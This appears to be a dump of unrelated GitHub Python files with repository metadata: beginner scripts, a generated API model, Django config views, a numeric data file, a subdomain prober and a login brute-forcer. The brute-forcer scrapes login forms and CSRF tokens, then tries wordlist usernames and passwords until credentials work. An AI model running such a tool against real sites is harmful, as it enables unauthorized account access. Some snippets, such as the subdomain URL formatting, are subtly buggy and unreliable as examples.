417cd82f7a985638ba65904bc40e92d25c3270ba
|
8a4b7cf4f887db7d44a39c039bbf1da63de24a50
|
/Sequencias no Python/listas.py
|
d3245a6f3684f8b2b11c17674f474d020f943ab0
|
[] |
no_license
|
doug-silva1992/basicoPython
|
2fe0be79999bd95d744d5daaea077e482b26a66e
|
dde089f4b2d2723afacc2fece1a264282f186716
|
refs/heads/master
| 2022-08-23T09:39:34.440193
| 2020-05-24T23:34:04
| 2020-05-24T23:34:04
| 266,245,419
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 230
|
py
|
participants = ['John', 'Leila', 'Gregory', 'Cate']
print(participants)
print(participants[1])
print(participants[-2])
participants[3] = 'Maria'
print(participants)
del participants[2]
print(participants)
print(participants[2])
|
[
"dvalverde"
] |
dvalverde
|
41ed90e1efa2e54d0712813739dca91b33844f38
|
2c74cd55ce55cfad2e10011127e97dc6aa417d59
|
/subs.py
|
92de443a3804e88522bdae670b3f75e06b3662ed
|
[] |
no_license
|
ajdensmore/Tools
|
4521638c103dfea13d5f71ec4a6360d38f00fdf1
|
0c50eaedbab6e0278f955268659470ca8e8c9893
|
refs/heads/master
| 2022-04-15T08:43:12.040255
| 2020-04-14T15:54:28
| 2020-04-14T15:54:28
| 255,639,087
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
#!/usr/local/bin/python
import requests
import sys
sub_list = open("subdomains-1000.txt").read()
subs = sub_list.splitlines()
for sub in subs:
url_to_check = f"http://(sub).{sys.argv[1]}"
try:
requests.get(url_to_check)
except requests.ConnectionError:
pass
else:
print("Valid domain: ",url_to_check)
|
[
"noreply@github.com"
] |
noreply@github.com
|
1540d8e9c7c999570183cbc454092b66ce1f7c03
|
0f4b03bbf60d4d76c132215ae2e21495b561e47e
|
/matthieu/internal_lib/bruteforce.py
|
78bac9b6bb20e7358d6bcdf35075c02c36a78b3e
|
[] |
no_license
|
brainOut/app_api
|
62fa0673da2b43c743a83446fc25a37d1ef7b3a0
|
4830057bedd28f2f9535c57a283c7a438bb6f62f
|
refs/heads/main
| 2023-03-22T05:09:58.737049
| 2021-03-12T21:26:09
| 2021-03-12T21:26:09
| 344,802,132
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,670
|
py
|
from .dirb import FuzzUrl # \o/ Merci Franรงois
from bs4 import BeautifulSoup
import requests
import re
from pathlib import Path
class BruteForcer:
def __init__(self, url, filename, target, userlist="wordlist/users.txt", passlist="wordlist/test_pass.txt"):
self.userlist = userlist
self.passlist = passlist
self.url = url
self.filename = filename
self.target = target
self.session = requests.Session()
def get_urls(self):
s = FuzzUrl(f'{self.url}', False)
s.dirchecker(True, True, f'{self.filename}')
def get_html_source(self):
with open(Path("internal_lib/results").absolute() / "output.txt", "r") as f:
for url in f.readlines():
html = self.session.get(url, headers={
"User-Agent": "Chocapic/3.0"}).content
return BeautifulSoup(html, 'html.parser')
def get_inputs(self):
html_bs4 = self.get_html_source()
html_inputs = html_bs4.findAll('input')
return html_inputs if len(html_inputs) != 0 else False
def get_form_action(self):
html_bs4 = self.get_html_source()
return html_bs4.form["action"]
def get_csrf_values(self):
html_bs4 = self.get_html_source()
csrf = html_bs4.find('input', {'name': re.compile("csrf")})
return (csrf["name"], csrf["value"]) if csrf is not None else False
def get_form_header(self):
r = self.session.get(self.url + self.get_form_action())
headers = r.headers
return headers
def get_cookies(self):
r = self.session.get(self.url + self.get_form_action())
cookies = r.cookies
return cookies
def brute_force(self):
global payload
url = self.url + self.get_form_action()
print(url)
user_list = self.userlist
pass_list = self.passlist
with open(Path(f"internal_lib/{user_list}"), "r") as uf:
for user in uf.readlines():
with open(Path(f"internal_lib/{pass_list}"), "r") as pf:
for passwd in pf.readlines():
user = user.strip("\r\n")
password = passwd.strip("\r\n")
if self.get_csrf_values():
payload = {
self.get_csrf_values()[0]: self.get_csrf_values()[1],
"username": user,
"password": password,
}
r = self.session.post(url, payload, cookies=self.session.cookies, headers=self.session.headers)
if BeautifulSoup(r.content, 'html.parser').find(text=re.compile(self.target)):
print("\033[92mCredentials found !! ")
print(f'-user:{user} -password:{passwd}')
return "Credentials Found !"
def launch(self):
# self.get_urls()
return self.brute_force()
# -------------------------
# 1 - rรฉcuperer les champs depuis le fuzzer OK
# 2 - faire la requete en POST avec les users/ pass (users.txt et rockyou.txt)
# 3 - vรฉrifier le retour de la requete (savoir si c'est ok ou ko)
# user admin // pass azerty
if __name__ == "__main__":
# s = FuzzUrl('127.0.0.1:8000')
# s.dirchecker(True, True, 'urls_to_bruteforce.txt')
b = BruteForcer("http://127.0.0.1:8000", 'urls.txt')
# b.get_urls()
# print(b.get_inputs())
# print(b.get_form_action())
# print(b.get_csrf_values())
# print(b.get_cookies())
# print(b.get_form_header())
b.brute_force()
|
[
"mlamamra@jehann.fr"
] |
mlamamra@jehann.fr
|
705298b32622dbaf11a94a4320eac4278c72051a
|
896da6e62703afc5cbeca27969bf9d3a813b2605
|
/yodlee/models/holding_type_list_response.py.3ec3f47a605b66b6dd09b1e33e8e8126.tmp
|
50330eaed8b52422ae97e28b8289f8a23984a0b0
|
[] |
no_license
|
webclinic017/yodlee_client
|
4d150f74c8c2255b096f3765c3772c6fb0bcbe81
|
7cbf79d3367fd13da375bf7134718bae51b4e8fe
|
refs/heads/master
| 2023-08-04T01:51:17.850386
| 2021-09-22T21:29:34
| 2021-09-22T21:31:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,666
|
tmp
|
# coding: utf-8
"""
Yodlee Core APIs
This file describes the Yodlee Platform APIs, using the swagger notation. You can use this swagger file to generate client side SDKs to the Yodlee Platform APIs for many different programming languages. You can generate a client SDK for Python, Java, javascript, PHP or other languages according to your development needs. For more details about our APIs themselves, please refer to https://developer.yodlee.com/Yodlee_API/. # noqa: E501
OpenAPI spec version: 1.1.0
Contact: developer@yodlee.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from yodlee.configuration import Configuration
class HoldingTypeListResponse(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'holding_type': 'list[str]'
}
attribute_map = {
'holding_type': 'holdingType'
}
def __init__(self, holding_type=None, _configuration=None): # noqa: E501
"""HoldingTypeListResponse - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._holding_type = None
self.discriminator = None
if holding_type is not None:
self.holding_type = holding_type
@property
def holding_type(self):
"""Gets the holding_type of this HoldingTypeListResponse. # noqa: E501
:return: The holding_type of this HoldingTypeListResponse. # noqa: E501
:rtype: list[str]
"""
return self._holding_type
@holding_type.setter
def holding_type(self, holding_type):
"""Sets the holding_type of this HoldingTypeListResponse.
:param holding_type: The holding_type of this HoldingTypeListResponse. # noqa: E501
:type: list[str]
"""
allowed_values = ["stock", "mutualFund", "bond", "CD", "option", "moneyMarketFund", "other", "remic", "future", "commodity", "currency", "unitInvestmentTrust", "employeeStockOption", "insuranceAnnuity", "unknown", "preferredStock", "ETF", "warrants", "ETN"] # noqa: E501
if (self._configuration.client_side_validation and
not set(holding_type).issubset(set(allowed_values))): # noqa: E501
raise ValueError(
"Invalid values for `holding_type` [{0}], must be a subset of [{1}]" # noqa: E501
.format(", ".join(map(str, set(holding_type) - set(allowed_values))), # noqa: E501
", ".join(map(str, allowed_values)))
)
self._holding_type = holding_type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(HoldingTypeListResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, HoldingTypeListResponse):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, HoldingTypeListResponse):
return True
return self.to_dict() != other.to_dict()
|
[
"jordan-hamill@hotmail.com"
] |
jordan-hamill@hotmail.com
|
21a0ee4f7316533bbb7ac7285f5705a31c1f9ea2
|
9c91ebc7a8b9e18327ba5b7bdd5c37606d5981c7
|
/RGG/testWorkflowConfig.py
|
5f2a792f5d3ac097910fa3447c9adc9833546cec
|
[] |
no_license
|
ajserensits/RGG
|
acb9af24339e0d59aa42dfd6ea8a67778974fd46
|
0ab29b6a37e6e4b189e0d85472f4651b2beff297
|
refs/heads/master
| 2020-08-04T00:59:01.449675
| 2019-10-01T19:04:00
| 2019-10-01T19:04:00
| 211,945,114
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,370
|
py
|
import json
from django.http import HttpResponse
from . import settings
def update(request):
rgg = request.GET.get('rgg')
radial = request.GET.get('radial')
mapping = request.GET.get('mapping')
file = open(settings.WORKFLOW_CONFIG_URL)
data = json.load(file)
file.close()
data[mapping]["RGG"] = rgg
data[mapping]["Radial"] = radial
data = json.dumps(data)
#file = open(WORKFLOW_CONFIG_URL, "w")
file.write(data)
file.close
return HttpResponse('{"Status" : "Success"}' , content_type="application/json")
def getNumberMappings(request):
json_data = open(settings.WORKFLOW_CONFIG_URL)
data = json.load(json_data)
response_data = json.dumps(data)
return HttpResponse(response_data , content_type="application/json")
def getWorkflowByName(name):
json_data = open(settings.WORKFLOW_CONFIG_URL)
data = json.load(json_data)
workflows = data["Workflows"]
for i in range(len(workflows)):
if workflows[i]["Name"] == name:
return workflows[i]
return None
def test():
json_data = open(settings.WORKFLOW_CONFIG_URL)
data = json.load(json_data)
workflows = data["Workflows"]
for i in range(len(workflows)):
if workflows[i]["Type"] == "Main":
print(workflows[i])
workflow = getWorkflowByName("Gilt_Noir_Main")
print(workflow)
|
[
"noreply@github.com"
] |
noreply@github.com
|
2ec4138b6920016a1f4c5a330d3efbf33d001b78
|
aa7eca0eeccc7c71678a90fc04c02dce9f47ec46
|
/Codes_13TeV/LimitTool_HiggsCombine/ExcitedQuarksShapeInterpolator/inputs/PhMID_JetTID_Pt200_170_DEta1p5_NoDPhi_CSVL_Summer16_35866pb/input_shapes_Bstar_1bTag_f1p0_13TeV_PhMID-JetTID-Pt200_170-DEta1p5-noDPhi-CSVL_mass700_80X_Summer16_BSFUP.py
|
6ea3f07571854d8fbfed47972e78c70de2ef12ec
|
[] |
no_license
|
rockybala/Analyses_codes
|
86c055ebe45b8ec96ed7bcddc5dd9c559d643523
|
cc727a3414bef37d2e2110b66a4cbab8ba2bacf2
|
refs/heads/master
| 2021-09-15T10:25:33.040778
| 2018-05-30T11:50:42
| 2018-05-30T11:50:42
| 133,632,693
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164,354
|
py
|
shapes = {
500 : [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.719812400163282e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.865716791838332e-05, 5.977569284706053e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.67530355174229e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.947211023705698e-05, 0.0, 0.0, 0.0, 0.0, 6.069732442932561e-05, 0.0, 5.752445992197769e-05, 0.0, 0.0, 3.8352599264915734e-05, 5.801688987934455e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.690822300899203e-05, 0.0, 0.0, 0.0, 0.0, 5.677552670598218e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.8129659228619466e-05, 0.00012040985732351282, 0.0, 0.0, 5.7589072941251475e-05, 0.0, 5.725893625506697e-05, 0.0, 0.0, 0.0, 0.0, 0.00011766651354584125, 0.0, 5.686997602201208e-05, 0.0, 0.0, 6.436145074262042e-05, 0.0, 5.933364725484217e-05, 6.567043563745048e-05, 0.0, 5.799596572317793e-05, 0.0, 6.346529625791008e-05, 6.383377110386828e-05, 0.0, 6.416828408415301e-05, 0.0, 0.0, 0.00021583469945338465, 0.00023772018155735427, 0.00011959896649586162, 0.000457456392787472, 0.00030735880477527033, 0.0003460050602122696, 0.0005814876790653045, 0.0004769161771272102, 0.00034630795902632, 0.0006883028522848998, 0.0006930790758449121, 0.0007716148645209419, 0.0008863692278614754, 0.0013432161305226996, 0.0010744028124541314, 0.001115329914879285, 0.0012124761677348344, 0.001869556668866572, 0.0016050374070382463, 0.002119818329207592, 0.0018229560658316727, 0.0020861958086724496, 0.0021863606103836183, 0.003003779592413221, 0.003346623577900035, 0.0027386636958225672, 0.003291392558208349, 0.004441424661846416, 0.004435574650707961, 0.004576446099028985, 0.004298394241769288, 0.005032622972828908, 0.0063219886221029505, 0.00559068617303167, 0.006434433852096067, 0.007171822632187213, 0.006842450338705542, 0.007373149665973223, 0.0071419092032475855, 0.009693864875725891, 0.009056570694294722, 0.008369506378826578, 0.0103697171257093, 0.010050799798833027, 0.011491121336799675, 0.011010974770830557, 0.011010642901861292, 0.012441025146544014, 0.012840945489068101, 0.011766248735526907, 0.015012073131416831, 0.013857939346133344, 0.014399787282621306, 0.014243813243360461, 0.014349308188940096, 0.016014628135480782, 0.015860508186153727, 0.016854223076135256, 0.019651929543810794, 0.016788677860631727, 0.01655093130734378, 0.018359175184138488, 0.018177878448449137, 0.01967888897423278, 0.019944340386704448, 0.020365522224732053, 0.019793695214892958, 0.02068874801314998, 0.01881468321432343, 0.01837182121532339, 0.017412059073735983, 0.01830723294946311, 0.019104774621343978, 0.016428316299244128, 0.016396812816781424, 0.015797841113403436, 0.014747944818528123, 0.014750109625343026, 0.014196982520194126, 0.012794454658076883, 0.01043574519232855, 0.010453801781786013, 0.012105837487585515, 0.009014491897138864, 0.009084513332124556, 0.00913236519058094, 0.007276150566006793, 0.007282981231714869, 0.006364203084375915, 0.006787201813837455, 0.006907532396416799, 0.00503936757141968, 0.005108735479819742, 0.004409328920915483, 0.004521833595570128, 0.004986833807658423, 0.004083513460463757, 0.0032512411539124576, 0.003382291468890263, 0.0036790767824282536, 0.002342844852598312, 0.002456352427984255, 0.0032547119198250984, 0.0023598226855600724, 0.002284902171674784, 0.0018112549494812393, 0.0025311436588479996, 0.0024814783735238417, 0.00178864409663016, 0.0016492910400163212, 0.0021164518649710064, 0.001666824297637633, 0.002389188713045999, 0.0014850773506927208, 0.0016819812275625315, 0.0009993337780878173, 0.0009930066597196466, 0.0015634255969319978, 0.0015675714062095957, 0.001309983008989682, 0.001252994542525587, 0.0013956960111628483, 0.001148923260120426, 0.001661564356820357, 0.0012915090304824127, 0.0011303310304996573, 0.001430589936306895, 0.0009777501691039683, 0.00024384302728111838, 0.0011431935058969337, 0.0010192796501774567, 0.0014231653710203031, 0.0010403804080455826, 0.0010823384924225103, 0.0007261336810477586, 0.0011576003572476151, 0.0005086687436624507, 0.001101170141799678, 0.0009843127867984066, 0.0008946953097327103, 0.0006727279862734313, 0.0012010799332067153, 0.0009411295224190079, 0.0005868390661947163, 0.0007406880955651314, 0.00081976285221144, 0.0009345297973975117, 0.000536954874992754, 0.000828897272072101, 0.0006995129575545692, 0.00031361266580365944, 0.0005284293982215783, 0.0005962570790303502, 0.0007959788790231235, 0.00039597866913170643, 0.0006686961429880265, 0.0005251011809719726, 0.0005090012964276698, 0.00039665731382201695, 0.00039839834949155, 0.0006285056711500112, 0.0009215730493314932, 0.00051322341733364, 0.0004713421460354504, 0.0005068901448018909, 0.0004342172682146316, 0.0007322269867863463, 0.0005044862829217637, 0.00030060408600439165, 0.00029477244618387896, 0.0006133014225451543, 0.0007052866114782542, 0.0005629157353911463, 0.0002471569987817, 0.0006004637005613822, 0.0006327723755521274, 0.0006821241632249611, 0.0003649229590523288, 0.00023894898567837698, 0.0006191149189797099, 0.0005278272930916246, 0.00011531676271880723, 0.00019335381341980228, 0.00024421900108936287, 0.0003627975160911289, 0.00034578394339421686, 3.315336813168086e-05, 0.00030142630505166685, 0.0005567931631857634, 0.00033121758524086225, 0.00024780165881313856, 0.0003871989114387499, 0.0004268643647439306, 0.0003589286441745599, 0.00029108459784930917, 0.00024966753283051985, 0.0004218595709899761, 0.00018696799116905293, 0.00036313884423774676, 0.00017340983316563316, 0.0001719879706538356, 0.00048055574946748706, 0.0003632467016527582, 0.00024361069620943386, 0.00042320942978790613, 0.00039607531229308605, 0.0002536019579857982, 0.0003468422999773158, 0.0003319508880210285, 0.0003975076824693638, 0.00012120815490902671, 0.00022359573793532698, 0.00017218298925967616, 0.00017818932754962144, 0.00024691078665216635, 0.0003139456288464503, 0.00013047833105958793, 0.00023384647748271625, 0.00026670104957606563, 0.00017807803975824503, 0.0004059275811453719, 6.50366255246124e-07, 6.424237337567764e-05, 0.00040975000052352313, 0.00011607226607425266, 0.00018387268621769193, 0.0003914720891092226, 0.0003277413489605963, 0.00018481650697863697, 0.0002687739314216662, 0.00013544378375303742, 0.0003072253733916108, 6.500285134668229e-05, 0.0001388793455706897, 0.00035390210570929496, 0.00013665687196373673, 0.00031400311329291247, 5.6687305631425626e-05, 0.00011385282396269204, 0.0003541049651753984, 0.00017176126950216541, 0.00035292049382533875, 0.00028815574022954596, 0.000345824538080636, 0.00017983768607430324, 0.00023988977494392968, 0.00011823850886065762, 0.00042408705910058556, 0.0003569169392735686, 0.00011583220810829745, 0.0002480868473120022, 0.0003872743569255816, 0.00031100580769823815, 0.0001677501794239388, 0.00013345213686667204, 0.00025703723488847, 0.00023533298150528565, 6.703822128595248e-05, 0.00023881532636273309, 9.804807714837126e-05, 0.00011914965557164095, 0.00018777593027750634, 0.00018498560971785284, 0.00018543818006945025, 0.00017773881998248275, 0.0001121267634245331, 0.00023028613430021194, 0.00020930310330202135, 0.00010419135697453558, 0.00025700092532335734, 0.00022700512176457253, 7.154407192608631e-05, 0.00036606152490073317, 0.00011365012404897767, 0.0001812504540999238, 0.00028867790961257557, 7.602425742477827e-05, 0.0002440299770947117, 0.00025127807743899203, 0.00012232225225890722, 0.00014787139911390324, 0.0002555689654246515, 0.0003182993348870066, 6.434834465351824e-05, 0.00012652596765713834, 0.00023124695878719217, 0.00027771141804781776, 6.302966695105218e-05, 0.00012350282597203388, 0.0002488102350508477, 9.533939042892558e-05, 0.00011795335455159166, 0.00018668076267892907, 0.00023506789660744486, 6.734039071765284e-05, 0.00011605125074529228, 0.0002481588054394728, 0.0, 0.00019889855525156847, 6.615331524467158e-05, 0.0, 0.00011516890324053611, 0.00017180854259572702, 0.0, 0.00014596426940734816, 0.0001945012230292008, 0.00011514082202005977, 0.0, 6.505295649514992e-05, 0.00011428313675601414, 0.00012162467781729346, 0.0001241335137728296, 5.4226153047023e-05, 0.0001862533674150071, 0.0001166273488358276, 0.00024142717617861245, 0.00018233651581572486, 0.0, 0.0, 6.14539218582961e-05, 0.00011706905822836899, 0.00013159951709418283, 5.665580543118349e-05, 0.00012249687095214524, 7.068501337183476e-05, 2.6452162092436397e-05, 5.946959728692913e-05, 6.951055963248885e-05, 0.00012265902176583738, 0.00011828183873088938, 0.00020196569920625864, 0.0002825855156019254, 0.00019777013237646932, 0.0001761054935721712, 0.0, 4.925427267161381e-05, 5.8961514100534564e-05, 0.000122941509270686, 0.0001146208635772787, 0.0001448300570598456, 0.0001221524771203374, 8.05362622284905e-05, 0.00021062823147964554, 3.2964780056949784e-05, 0.00018544443680242162, 0.0003126653576833533, 0.0003184850766610826, 0.0, 0.00012800534880519566, 0.00012136633970619051, 0.00020099142673219963, 5.810523061819291e-05, 0.0, 6.48220499983678e-05, 6.148314843699399e-05, 0.00029813838617690055, 0.00012550408019154112, 4.9267327476019515e-05, 0.0001729203720223629, 0.0, 0.00011533034746507663, 0.0, 0.00012225357635201175, 0.00024094790359504426, 0.00025041302997185074, 5.9835553484459876e-05, 5.683631616621789e-05, 0.00012940462325734058, 5.811916865903811e-05, 0.0, 0.00011686520725813348, 5.666039826066887e-05, 0.0, 5.887605670128869e-05, 7.561079450340189e-05, 0.0001065535073015202, 5.7230131350540205e-05, 0.0, 0.0002945998332921035, 0.00012175000621890804, 5.9503040607338146e-05, 6.503120038724028e-05, 7.043001446430305e-05, 0.0, 0.00011569966565937707, 2.6797177038901694e-05, 5.891588211726051e-05, 0.00010276825223342313, 5.7144400432913065e-05, 0.00011620102485223225, 6.974108434319712e-05, 0.0001253508415184385, 0.00015965696426455171, 0.00013561102884658056, 0.00011668388736455451, 0.00012159435146677092, 5.8883196670699574e-05, 0.0, 0.0001246932919332829, 0.0, 4.449460267196749e-05, 6.447798666793732e-05, 0.0, 5.81092992041142e-05, 0.0, 0.00010703717897238704, 6.215796956826642e-05, 0.0, 0.0, 2.188760187142439e-05, 5.657753358774538e-05, 0.0, 0.00013990228152341508, 6.52433822715051e-05, 0.00018827570534307004, 5.810635888151562e-05, 0.00011825730185277024, 5.528832749086041e-05, 0.0, 0.0001902230422516708, 0.00011444877492906737, 0.00013858546146662177, 5.744445579545825e-05, 0.0, 0.0, 0.00011471011034576499, 5.8031614285535884e-05, 6.151828985068668e-05, 8.344025816705685e-05, 5.6647440327356535e-05, 0.0, 0.00013930881501566955, 5.813957996823986e-05, 0.0, 5.7211708747902217e-05, 5.7403325468875815e-05, 6.438565711936221e-05, 0.0, 5.669965384667973e-05, 0.00017392075410523332, 7.646771619529983e-05, 6.0208752220794487e-05, 0.0, 5.8141768115289965e-05, 0.0, 5.712674710072238e-05, 0.00012165265646837683, 0.00011940060868644981, 0.00011761921765908119, 0.0, 0.0, 6.513439089487138e-05, 7.253166132633305e-05, 5.6663697576142855e-05, 5.418130956595743e-06, 5.681025214380337e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00014195902578452104, 0.0, 0.00011833240544162539, 0.0, 6.923905844928761e-05, 0.00012085222771880894, 0.0, 5.984506964480799e-05, 7.316774541685911e-05, 5.6989606124017005e-05, 0.0, 0.00012201733624679501, 7.644119630891653e-05, 5.7168726473946645e-05, 0.0, 1.6999813796360844e-06, 0.0, 0.0, 5.727979203163828e-05, 1.660947350636924e-05, 0.0, 7.801602397543544e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 6.771848999165175e-05, 5.988005150611161e-05, 3.3433997990856754e-05, 9.079643531088355e-06, 0.0, 0.00019203987670261144, 6.18904913845896e-05, 0.0, 0.0, 0.0, 8.410568280227298e-05, 0.0, 0.00011852960079791683, 0.0, 0.00012212874940076282, 5.424981238700225e-05, 7.482142615337632e-05, 5.7417331889316325e-05, 0.0, 0.0, 0.0, 0.0, 5.951958277110495e-05, 0.0, 0.0, 0.0, 0.0, 0.00012319375020120664, 0.0, 0.0, 0.0, 8.12215112480486e-05, 6.153573234579181e-05, 5.4547200945330116e-05, 0.0, 2.6956336245298742e-05, 4.931121577961301e-05, 0.0, 5.8839108926619735e-05, 5.727344412587313e-05, 6.02219950690873e-05, 0.0, 0.0, 5.739424807759765e-05, 5.889964196337302e-05, 0.00012002121049693646, 0.0, 5.931117885948133e-05, 5.7772655059775474e-05, 0.0, 0.0, 0.0001303595898923221, 0.0, 9.076994534057319e-06, 0.00011481320398230273, 0.0, 0.0, 7.140742670144697e-05, 0.0, 4.590228211603663e-05, 0.0, 0.00012732289765074592, 0.0, 1.1467879249111036e-05, 0.0, 5.4265494107528e-05, 0.0, 6.512910287283363e-05, 0.0, 6.24218065384927e-05, 5.74743775667085e-05, 5.757775611822672e-05, 0.0, 7.74435727966503e-05, 0.0, 0.0, 0.0, 0.0, 0.00012344755246582032, 5.097392547186171e-07, 0.0, 0.0, 6.022516332367027e-05, 2.2001082083575605e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 6.18849925254663e-05, 0.0, 6.440421078289122e-05, 0.00011877369315999567, 0.00011692250935900809, 6.477479969800461e-05, 0.0, 0.0, 7.067619810233862e-05, 0.0, 0.0, 0.0, 6.47756829344441e-05, 0.0, 0.0, 0.0, 0.00012984779141458205, 6.021626257968e-05, 5.916390630607e-05, 5.8956773115259335e-05, 0.0, 0.0, 0.0, 5.670183629543022e-05, 5.749975209487026e-05, 0.0, 5.83930061450793e-05, 5.756619426831874e-05, 0.0, 0.0, 6.475348805746453e-05, 6.441121399311147e-05, 0.0, 2.739825362577589e-05, 6.024498770801223e-05, 5.812270160479609e-05, 0.0, 0.0, 0.0, 5.715838975845475e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.195902483399483e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00011405866933779093, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.847578534350864e-05, 0.0, 0.0, 0.0, 0.0, 5.701236513265794e-05, 0.00013053388948078198, 0.0, 0.0, 0.0, 4.958033507357742e-05, 5.981530172764719e-05, 0.00013817606143286707, 0.0, 0.0, 0.0, 0.0, 0.0, 6.481511516774286e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.192627100783857e-05, 0.0, 7.524204044076281e-05, 0.0, 4.4394707918373124e-06, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1292325085121636e-06, 6.0348457432324196e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.481269339040876e-05, 0.0, 6.0261564061576694e-05, 5.7591078742714075e-05, 6.551951189856428e-07, 0.0, 0.0, 0.0, 5.84873357968174e-05, 0.0, 6.549627850648084e-05, 5.7153301176903336e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.0288836123508466e-05, 0.0, 0.0, 0.0, 0.0, 7.258102569585143e-05, 0.0, 0.0, 2.698522377516985e-05, 0.0, 0.0, 0.0, 6.552308900614423e-05, 0.0, 0.0, 5.808876823062064e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.181179810461193e-05, 0.0, 0.0, 0.0, 5.9894832895299035e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.894568422421896e-05, 0.0, 0.0, 0.0, 6.120101422672115e-05, 0.0, 0.0, 0.0001251450531263357, 5.702523189317652e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0001442537424339251, 0.0, 5.701697505704214e-05, 3.379423594472922e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.482243748274126e-05, 0.0, 5.927384360043892e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00011511144158727242, 0.0, 0.0, 0.0, 0.0, 0.0, 6.194795303785327e-05, 0.0, 0.0, 0.0, 5.9216057144097495e-05, 0.0, 0.0, 0.0, 0.0, 5.093051155171071e-07, 0.0, 0.00010419111764595197, 7.272960315987335e-05, 0.0, 0.0, 4.488832098519644e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.3595687242280485e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.7812036008377745e-05, 5.847775125687397e-05, 0.0, 0.0, 5.13611733658839e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 